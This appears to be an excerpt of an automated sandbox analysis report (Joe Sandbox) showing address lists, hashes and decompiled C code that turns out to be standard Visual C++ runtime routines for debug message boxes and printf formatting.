    0x00b96fbe
    0x00b96fc0
    0x00b96fc5
    0x00b96fcb
    0x00b96fcd
    0x00b96fcd
    0x00b96fcb
    0x00b96fd5
    0x00b97020
    0x00b97029
    0x00b9702e
    0x00b96fd7
    0x00b96fdc
    0x00b96ff8
    0x00b97000
    0x00b9700d
    0x00b97012
    0x00b97012
    0x00000000
    0x00b96fd5
    0x00b96f79
    0x00b96f80
    0x00000000
    0x00000000
    0x00b96f82
    0x00b96f82
    0x00000000
    0x00b96f82
    0x00b96832
    0x00b96832
    0x00b96837
    0x00b96853
    0x00b9685b
    0x00b96865
    0x00b96868
    0x00b9686d
    0x00b97034
    0x00b97041
    0x00b97041
    0x00b9687d
    0x00b96883
    0x00b968a3
    0x00b96885
    0x00b96892
    0x00b96892
    0x00b968a5
    0x00000000
    0x00b968a5

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Locale_write_multi_char$UpdateUpdate::~___get_printf_count_output__invalid_parameter__mbtowc_l_get_int_arg_write_string
    • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_x86\crt\src\output.c
    • API String ID: 2386203720-1989478660
    • Opcode ID: ef549b90ded2b9d6967130d0073e7426e0a45d718ac501cd82bdc4eb7ad2b9c5
    • Instruction ID: 4a5f77017893636e53414a4362022a2088d1d736b5fe8d4cb24882136a759df4
    • Opcode Fuzzy Hash: ef549b90ded2b9d6967130d0073e7426e0a45d718ac501cd82bdc4eb7ad2b9c5
    • Instruction Fuzzy Hash: C7A15CB19002299BDF24DF54CC81BADB7F4EF44304F1481E9E6196B292EA749E84CF59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 59%
    			E00B8A1B7() {
    				intOrPtr _t36;
    				intOrPtr* _t37;
    				void* _t40;
    				void* _t48;
    				void* _t62;
    				void* _t63;
    				signed int _t64;
    				void* _t66;
    				void* _t67;
    
    				 *(_t64 - 0x114c) = "...";
    				if( *((intOrPtr*)(_t64 + 0x14)) == 0) {
    					 *(_t64 - 0x1150) = 0xb73356;
    				} else {
    					 *(_t64 - 0x1150) = "\nModule: ";
    				}
    				_push( *((intOrPtr*)(_t64 - 0x1124)));
    				_push( *((intOrPtr*)(_t64 - 0x1128)));
    				_push( *((intOrPtr*)(_t64 - 0x112c)));
    				_push( *((intOrPtr*)(_t64 - 0x1130)));
    				_push( *((intOrPtr*)(_t64 - 0x1134)));
    				_push( *((intOrPtr*)(_t64 - 0x1138)));
    				_push( *((intOrPtr*)(_t64 - 0x113c)));
    				_push( *((intOrPtr*)(_t64 - 0x1140)));
    				_push( *((intOrPtr*)(_t64 - 0x1144)));
    				_push( *(_t64 - 0x114c));
    				_push( *(_t64 - 0x1150));
    				_push( *((intOrPtr*)(_t64 - 8)));
    				_t61 =  *(_t64 + 8);
    				_t53 = _t64 - 0x1010;
    				_t36 = E00B8C5E0(_t64 - 0x1010, _t64 - 0x1010, 0x1000, 0xfff, "Debug %s!\n\nProgram: %s%s%s%s%s%s%s%s%s%s%s%s\n\n(Press Retry to debug the application)",  *((intOrPtr*)(0xb75220 +  *(_t64 + 8) * 4)));
    				_t67 = _t66 + 0x44;
    				 *((intOrPtr*)(_t64 - 0xc)) = _t36;
    				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
    					_t61 =  *(L00B80C60(_t53));
    					E00B7DC00( *(L00B80C60(_t53)), 0x16, 0x22, L"(*_errno())", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x160, 0);
    					_t67 = _t67 + 0x20;
    				}
    				_t37 = L00B80C60(_t53);
    				_t54 =  *((intOrPtr*)(_t64 - 0x1120));
    				 *_t37 =  *((intOrPtr*)(_t64 - 0x1120));
    				if( *((intOrPtr*)(_t64 - 0xc)) < 0) {
    					_t61 = _t64 - 0x1010;
    					E00B7DBD0(E00B80CC0(_t48, _t54, _t62, _t63, _t64 - 0x1010, 0x1000, "_CrtDbgReport: String too long or IO Error"), _t44, L"strcpy_s(szOutMessage, 4096, \"_CrtDbgReport: String too long or IO Error\")", L"__crtMessageWindowA", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\dbgrpt.c", 0x165, 0);
    					_t67 = _t67 + 0x24;
    				}
    				 *((intOrPtr*)(_t64 - 0x111c)) = E00B901F0(_t64 - 0x1010, "Microsoft Visual C++ Debug Library", 0x12012);
    				if( *((intOrPtr*)(_t64 - 0x111c)) == 3) {
    					E00B87110(0x16);
    					E00B85980(3);
    				}
    				if( *((intOrPtr*)(_t64 - 0x111c)) != 4) {
    					_t40 = 0;
    				} else {
    					_t40 = 1;
    				}
    				return E00B805D0(_t40, _t48,  *(_t64 - 0x10) ^ _t64, _t61, _t62, _t63);
    			}












    0x00b8a1b7
    0x00b8a1d1
    0x00b8a1df
    0x00b8a1d3
    0x00b8a1d3
    0x00b8a1d3
    0x00b8a1ef
    0x00b8a1f6
    0x00b8a1fd
    0x00b8a204
    0x00b8a20b
    0x00b8a212
    0x00b8a219
    0x00b8a220
    0x00b8a227
    0x00b8a22e
    0x00b8a235
    0x00b8a239
    0x00b8a23a
    0x00b8a254
    0x00b8a25b
    0x00b8a260
    0x00b8a263
    0x00b8a26a
    0x00b8a28b
    0x00b8a28e
    0x00b8a293
    0x00b8a293
    0x00b8a296
    0x00b8a29b
    0x00b8a2a1
    0x00b8a2a7
    0x00b8a2c9
    0x00b8a2d9
    0x00b8a2de
    0x00b8a2de
    0x00b8a2fa
    0x00b8a307
    0x00b8a30b
    0x00b8a315
    0x00b8a315
    0x00b8a321
    0x00b8a32a
    0x00b8a323
    0x00b8a323
    0x00b8a323
    0x00b8a339

    APIs
    Strings
    • (*_errno()), xrefs: 00B8A27D
    • Microsoft Visual C++ Debug Library, xrefs: 00B8A2E6
    • strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error"), xrefs: 00B8A2BA
    • __crtMessageWindowA, xrefs: 00B8A278, 00B8A2B5
    • f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c, xrefs: 00B8A273, 00B8A2B0
    • ..., xrefs: 00B8A1B7, 00B8A22E
    • Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application), xrefs: 00B8A245
    • Module: , xrefs: 00B8A1D3
    • _CrtDbgReport: String too long or IO Error, xrefs: 00B8A2BF
    Memory Dump Source
    • Source File: 00000000.00000002.638265274.0000000000B71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
    • Associated: 00000000.00000002.638237207.0000000000B70000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638841801.0000000000D11000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.638905915.0000000000D16000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b70000_SecuriteInfo.jbxd
    Similarity
    • API ID: Message___crt__invoke_watson_if_error__invoke_watson_if_oneof__snwprintf_s_raise_wcscpy_s
    • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_x86\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
    • API String ID: 1485069716-2339404796
    • Opcode ID: 28724d4d8763be83557e8038a051814e89bf27276f7246fb0cd284fdda0c4657
    • Instruction ID: 5c0ddd3bcaeb25980f213b2dcfc6551766cc1520b92da903ebae4d6ed9042731
    • Opcode Fuzzy Hash: 28724d4d8763be83557e8038a051814e89bf27276f7246fb0cd284fdda0c4657
    • Instruction Fuzzy Hash: 67318FB5A40218ABDB28EB94DC46FDAB3F4AB58B40F0081D9F31C762A1D7B05A80CF51
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 66%
    			E00B95295(void* __eflags) {
    				intOrPtr _t495;
    				signed int _t497;
    				signed int _t503;
    				void* _t508;
    				signed int _t510;
    				void* _t530;
    				signed int _t548;
    				void* _t558;
    				signed int _t566;
    				signed int _t593;
    				void* _t621;
    				void* _t622;
    				signed int _t623;
    				void* _t625;
    				void* _t626;
    
    				L0:
    				while(1) {
    					L0:
    					_t495 = E00B93D50(_t623 + 0x14);
    					_t626 = _t625 + 4;
    					 *((intOrPtr*)(_t623 - 0x288)) = _t495;
    					if( *((intOrPtr*)(_t623 - 0x288)) == 0) {
    						goto L82;
    					}
    					L81:
    					__ecx =  *(__ebp - 0x288);
    					if( *(__ecx + 4) != 0) {
    						L83:
    						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    						if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    							 *(__ebp - 0xc) = 0;
    							__edx =  *(__ebp - 0x288);
    							__eax =  *(__edx + 4);
    							 *(__ebp - 4) =  *(__edx + 4);
    							__ecx =  *(__ebp - 0x288);
    							__edx =  *__ecx;
    							 *(__ebp - 0x24) =  *__ecx;
    						} else {
    							__edx =  *(__ebp - 0x288);
    							__eax =  *(__edx + 4);
    							 *(__ebp - 4) =  *(__edx + 4);
    							__ecx =  *(__ebp - 0x288);
    							__eax =  *__ecx;
    							asm("cdq");
    							 *__ecx - __edx =  *__ecx - __edx >> 1;
    							 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    							 *(__ebp - 0xc) = 1;
    						}
    						L86:
    						while(1) {
    							L190:
    							if( *(_t623 - 0x28) != 0) {
    								goto L216;
    							}
    							L191:
    							if(( *(_t623 - 0x10) & 0x00000040) != 0) {
    								if(( *(_t623 - 0x10) & 0x00000100) == 0) {
    									if(( *(_t623 - 0x10) & 0x00000001) == 0) {
    										if(( *(_t623 - 0x10) & 0x00000002) != 0) {
    											 *((char*)(_t623 - 0x14)) = 0x20;
    											 *(_t623 - 0x1c) = 1;
    										}
    									} else {
    										 *((char*)(_t623 - 0x14)) = 0x2b;
    										 *(_t623 - 0x1c) = 1;
    									}
    								} else {
    									 *((char*)(_t623 - 0x14)) = 0x2d;
    									 *(_t623 - 0x1c) = 1;
    								}
    							}
    							 *((intOrPtr*)(_t623 - 0x2c4)) =  *((intOrPtr*)(_t623 - 0x18)) -  *(_t623 - 0x24) -  *(_t623 - 0x1c);
    							if(( *(_t623 - 0x10) & 0x0000000c) == 0) {
    								E00B95E80(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    								_t626 = _t626 + 0x10;
    							}
    							E00B95EC0( *(_t623 - 0x1c), _t623 - 0x14,  *(_t623 - 0x1c),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    							_t626 = _t626 + 0x10;
    							if(( *(_t623 - 0x10) & 0x00000008) != 0) {
    								if(( *(_t623 - 0x10) & 0x00000004) == 0) {
    									E00B95E80(0x30,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    									_t626 = _t626 + 0x10;
    								}
    							}
    							if( *(_t623 - 0xc) == 0) {
    								L212:
    								E00B95EC0( *(_t623 - 4),  *(_t623 - 4),  *(_t623 - 0x24),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    								_t626 = _t626 + 0x10;
    								goto L213;
    							} else {
    								L204:
    								if( *(_t623 - 0x24) <= 0) {
    									goto L212;
    								}
    								L205:
    								 *(_t623 - 0x2dc) = 0;
    								 *(_t623 - 0x2c8) =  *(_t623 - 4);
    								 *(_t623 - 0x2cc) =  *(_t623 - 0x24);
    								while(1) {
    									L206:
    									 *(_t623 - 0x2cc) =  *(_t623 - 0x2cc) - 1;
    									if( *(_t623 - 0x2cc) == 0) {
    										break;
    									}
    									L207:
    									 *(_t623 - 0x32e) =  *( *(_t623 - 0x2c8));
    									_t548 = E00B97890(_t623 - 0x2d0, _t623 - 0x2d8, 6,  *(_t623 - 0x32e) & 0x0000ffff);
    									_t626 = _t626 + 0x10;
    									 *(_t623 - 0x2dc) = _t548;
    									 *(_t623 - 0x2c8) =  *(_t623 - 0x2c8) + 2;
    									if( *(_t623 - 0x2dc) != 0) {
    										L209:
    										 *(_t623 - 0x24c) = 0xffffffff;
    										break;
    									}
    									L208:
    									if( *(_t623 - 0x2d0) != 0) {
    										L210:
    										E00B95EC0( *((intOrPtr*)(_t623 + 8)), _t623 - 0x2d8,  *(_t623 - 0x2d0),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    										_t626 = _t626 + 0x10;
    										continue;
    									}
    									goto L209;
    								}
    								L211:
    								L213:
    								if( *(_t623 - 0x24c) >= 0) {
    									if(( *(_t623 - 0x10) & 0x00000004) != 0) {
    										E00B95E80(0x20,  *((intOrPtr*)(_t623 - 0x2c4)),  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    										_t626 = _t626 + 0x10;
    									}
    								}
    							}
    							L216:
    							if( *(_t623 - 0x20) != 0) {
    								L00B7EB20( *(_t623 - 0x20), 2);
    								_t626 = _t626 + 8;
    								 *(_t623 - 0x20) = 0;
    							}
    							while(1) {
    								L218:
    								 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
    								_t594 =  *(_t623 - 0x251);
    								 *(_t623 + 0xc) =  *(_t623 + 0xc) + 1;
    								if( *(_t623 - 0x251) == 0 ||  *(_t623 - 0x24c) < 0) {
    									break;
    								} else {
    									if( *(_t623 - 0x251) < 0x20 ||  *(_t623 - 0x251) > 0x78) {
    										 *(_t623 - 0x310) = 0;
    									} else {
    										 *(_t623 - 0x310) =  *( *(_t623 - 0x251) +  &M00B77B58) & 0xf;
    									}
    								}
    								L7:
    								 *(_t623 - 0x250) =  *(_t623 - 0x310);
    								_t510 =  *(_t623 - 0x250) * 9;
    								_t566 =  *(_t623 - 0x25c);
    								_t594 = ( *(_t510 + _t566 + 0xb77b78) & 0x000000ff) >> 4;
    								 *(_t623 - 0x25c) = ( *(_t510 + _t566 + 0xb77b78) & 0x000000ff) >> 4;
    								if( *(_t623 - 0x25c) != 8) {
    									L16:
    									 *(_t623 - 0x318) =  *(_t623 - 0x25c);
    									if( *(_t623 - 0x318) > 7) {
    										continue;
    									}
    									L17:
    									switch( *((intOrPtr*)( *(_t623 - 0x318) * 4 +  &M00B95CD0))) {
    										case 0:
    											L18:
    											 *(_t623 - 0xc) = 0;
    											_t513 = E00B91090( *(_t623 - 0x251) & 0x000000ff, E00B7C680(_t623 - 0x40));
    											_t629 = _t626 + 8;
    											__eflags = _t513;
    											if(_t513 == 0) {
    												L24:
    												E00B95DE0( *(_t623 - 0x251) & 0x000000ff,  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    												_t626 = _t629 + 0xc;
    												goto L218;
    											} else {
    												E00B95DE0( *((intOrPtr*)(_t623 + 8)),  *(_t623 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t623 + 8)), _t623 - 0x24c);
    												_t629 = _t629 + 0xc;
    												_t571 =  *( *(_t623 + 0xc));
    												 *(_t623 - 0x251) =  *( *(_t623 + 0xc));
    												_t594 =  *(_t623 + 0xc) + 1;
    												__eflags = _t594;
    												 *(_t623 + 0xc) = _t594;
    												asm("sbb eax, eax");
    												 *(_t623 - 0x27c) =  ~( ~( *(_t623 - 0x251)));
    												if(_t594 == 0) {
    													_push(L"(ch != _T(\'\\0\'))");
    													_push(0);
    													_push(0x486);
    													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    													_push(2);
    													_t525 = L00B7D760();
    													_t629 = _t629 + 0x14;
    													__eflags = _t525 - 1;
    													if(_t525 == 1) {
    														asm("int3");
    													}
    												}
    												L22:
    												__eflags =  *(_t623 - 0x27c);
    												if( *(_t623 - 0x27c) != 0) {
    													goto L24;
    												} else {
    													 *((intOrPtr*)(L00B80C60(_t571))) = 0x16;
    													E00B809F0(_t558, _t571, _t621, _t622, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    													 *(_t623 - 0x2f4) = 0xffffffff;
    													E00B7C650(_t623 - 0x40);
    													_t503 =  *(_t623 - 0x2f4);
    													goto L229;
    												}
    											}
    										case 1:
    											L25:
    											 *(__ebp - 0x2c) = 0;
    											__edx =  *(__ebp - 0x2c);
    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    											__eax =  *(__ebp - 0x28);
    											 *(__ebp - 0x18) =  *(__ebp - 0x28);
    											__ecx =  *(__ebp - 0x18);
    											 *(__ebp - 0x1c) = __ecx;
    											 *(__ebp - 0x10) = 0;
    											 *(__ebp - 0x30) = 0xffffffff;
    											 *(__ebp - 0xc) = 0;
    											goto L218;
    										case 2:
    											L26:
    											__edx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    											__eflags =  *(__ebp - 0x31c) - 0x10;
    											if( *(__ebp - 0x31c) > 0x10) {
    												goto L33;
    											}
    											L27:
    											__ecx =  *(__ebp - 0x31c);
    											_t74 = __ecx + 0xb95d08; // 0x498d04
    											__edx =  *_t74 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t74 & 0x000000ff) * 4 +  &M00B95CF0))) {
    												case 0:
    													goto L30;
    												case 1:
    													goto L31;
    												case 2:
    													goto L29;
    												case 3:
    													goto L28;
    												case 4:
    													goto L32;
    												case 5:
    													goto L33;
    											}
    										case 3:
    											L34:
    											__edx =  *((char*)(__ebp - 0x251));
    											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    											if( *((char*)(__ebp - 0x251)) != 0x2a) {
    												__eax =  *(__ebp - 0x18);
    												__eax =  *(__ebp - 0x18) * 0xa;
    												__eflags = __eax;
    												__ecx =  *((char*)(__ebp - 0x251));
    												_t98 = __ecx - 0x30; // -48
    												__edx = __eax + _t98;
    												 *(__ebp - 0x18) = __eax + _t98;
    											} else {
    												__eax = __ebp + 0x14;
    												 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x18);
    												if( *(__ebp - 0x18) < 0) {
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) | 0x00000004;
    													__eflags = __ecx;
    													 *(__ebp - 0x10) = __ecx;
    													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    												}
    											}
    											goto L218;
    										case 4:
    											L40:
    											 *(__ebp - 0x30) = 0;
    											goto L218;
    										case 5:
    											L41:
    											__eax =  *((char*)(__ebp - 0x251));
    											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    											if( *((char*)(__ebp - 0x251)) != 0x2a) {
    												__edx =  *(__ebp - 0x30);
    												__edx =  *(__ebp - 0x30) * 0xa;
    												__eflags = __edx;
    												_t109 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    												__ecx = __edx + _t109;
    												 *(__ebp - 0x30) = __ecx;
    											} else {
    												__ecx = __ebp + 0x14;
    												 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x30);
    												if( *(__ebp - 0x30) < 0) {
    													 *(__ebp - 0x30) = 0xffffffff;
    												}
    											}
    											goto L218;
    										case 6:
    											L47:
    											__edx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    											__eflags =  *(__ebp - 0x320) - 0x2e;
    											if( *(__ebp - 0x320) > 0x2e) {
    												L70:
    												goto L218;
    											}
    											L48:
    											__ecx =  *(__ebp - 0x320);
    											_t117 = __ecx + 0xb95d30; // 0x553e9003
    											__edx =  *_t117 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t117 & 0x000000ff) * 4 +  &M00B95D1C))) {
    												case 0:
    													L53:
    													__edx =  *(__ebp + 0xc);
    													__eax =  *( *(__ebp + 0xc));
    													__eflags =  *( *(__ebp + 0xc)) - 0x36;
    													if( *( *(__ebp + 0xc)) != 0x36) {
    														L56:
    														__edx =  *(__ebp + 0xc);
    														__eax =  *( *(__ebp + 0xc));
    														__eflags =  *( *(__ebp + 0xc)) - 0x33;
    														if( *( *(__ebp + 0xc)) != 0x33) {
    															L59:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc));
    															__eflags =  *( *(__ebp + 0xc)) - 0x64;
    															if( *( *(__ebp + 0xc)) == 0x64) {
    																L65:
    																L67:
    																goto L70;
    															}
    															L60:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx;
    															__eflags =  *__ecx - 0x69;
    															if( *__ecx == 0x69) {
    																goto L65;
    															}
    															L61:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc));
    															__eflags = __ecx - 0x6f;
    															if(__ecx == 0x6f) {
    																goto L65;
    															}
    															L62:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc));
    															__eflags =  *( *(__ebp + 0xc)) - 0x75;
    															if( *( *(__ebp + 0xc)) == 0x75) {
    																goto L65;
    															}
    															L63:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx;
    															__eflags =  *__ecx - 0x78;
    															if( *__ecx == 0x78) {
    																goto L65;
    															}
    															L64:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc));
    															__eflags = __ecx - 0x58;
    															if(__ecx != 0x58) {
    																 *(__ebp - 0x25c) = 0;
    																goto L18;
    															}
    															goto L65;
    														}
    														L57:
    														__ecx =  *(__ebp + 0xc);
    														__edx =  *((char*)(__ecx + 1));
    														__eflags =  *((char*)(__ecx + 1)) - 0x32;
    														if( *((char*)(__ecx + 1)) != 0x32) {
    															goto L59;
    														} else {
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    															__ecx =  *(__ebp - 0x10);
    															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    															 *(__ebp - 0x10) = __ecx;
    															goto L67;
    														}
    													}
    													L54:
    													__ecx =  *(__ebp + 0xc);
    													__edx =  *((char*)(__ecx + 1));
    													__eflags =  *((char*)(__ecx + 1)) - 0x34;
    													if( *((char*)(__ecx + 1)) != 0x34) {
    														goto L56;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00008000;
    														 *(__ebp - 0x10) = __ecx;
    														goto L67;
    													}
    												case 1:
    													L68:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    													goto L70;
    												case 2:
    													L49:
    													__eax =  *(__ebp + 0xc);
    													__ecx =  *( *(__ebp + 0xc));
    													__eflags = __ecx - 0x6c;
    													if(__ecx != 0x6c) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000010;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    													}
    													goto L70;
    												case 3:
    													L69:
    													__eax =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) | 0x00000800;
    													__eflags = __eax;
    													 *(__ebp - 0x10) = __eax;
    													goto L70;
    												case 4:
    													goto L70;
    											}
    										case 7:
    											L71:
    											__ecx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x324) = __ecx;
    											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    											__eflags =  *(__ebp - 0x324) - 0x37;
    											if( *(__ebp - 0x324) > 0x37) {
    												goto L190;
    												do {
    													do {
    														while(1) {
    															L190:
    															if( *(_t623 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    														L186:
    														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
    														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
    														__ecx =  *(__ebp - 4);
    														__ecx =  *(__ebp - 4) + 1;
    														 *(__ebp - 4) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    														__eflags =  *(__ebp - 0x10) & 0x00000200;
    													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) == 0) {
    														break;
    													}
    													L188:
    													__eax =  *(__ebp - 4);
    													__ecx =  *( *(__ebp - 4));
    													__eflags = __ecx - 0x30;
    												} while (__ecx == 0x30);
    												L189:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												while(1) {
    													L190:
    													if( *(_t623 - 0x28) != 0) {
    														goto L216;
    													}
    													goto L191;
    												}
    											}
    											L72:
    											_t158 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    											__ecx =  *_t158 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    												case 0:
    													L122:
    													 *(__ebp - 0x2c) = 1;
    													__ecx =  *((char*)(__ebp - 0x251));
    													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    													__eflags = __ecx;
    													 *((char*)(__ebp - 0x251)) = __cl;
    													goto L123;
    												case 1:
    													L73:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__eax =  *(__ebp - 0x10);
    														__eax =  *(__ebp - 0x10) | 0x00000800;
    														__eflags = __eax;
    														 *(__ebp - 0x10) = __eax;
    													}
    													goto L75;
    												case 2:
    													L87:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000800;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													}
    													goto L89;
    												case 3:
    													L146:
    													 *(__ebp - 0x260) = 7;
    													goto L148;
    												case 4:
    													goto L0;
    												case 5:
    													L123:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													__eax = __ebp - 0x248;
    													 *(__ebp - 4) = __ebp - 0x248;
    													 *(__ebp - 0x44) = 0x200;
    													__eflags =  *(__ebp - 0x30);
    													if( *(__ebp - 0x30) >= 0) {
    														L125:
    														__eflags =  *(__ebp - 0x30);
    														if( *(__ebp - 0x30) != 0) {
    															L128:
    															__eflags =  *(__ebp - 0x30) - 0x200;
    															if( *(__ebp - 0x30) > 0x200) {
    																 *(__ebp - 0x30) = 0x200;
    															}
    															L130:
    															__eflags =  *(__ebp - 0x30) - 0xa3;
    															if( *(__ebp - 0x30) > 0xa3) {
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																__eflags =  *(__ebp - 0x20);
    																if( *(__ebp - 0x20) == 0) {
    																	 *(__ebp - 0x30) = 0xa3;
    																} else {
    																	__eax =  *(__ebp - 0x20);
    																	 *(__ebp - 4) =  *(__ebp - 0x20);
    																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																}
    															}
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															__eax =  *(__ebp + 0x14);
    															__ecx =  *(__eax - 8);
    															__edx =  *(__eax - 4);
    															 *(__ebp - 0x2a8) =  *(__eax - 8);
    															 *(__ebp - 0x2a4) =  *(__eax - 4);
    															__ecx = __ebp - 0x40;
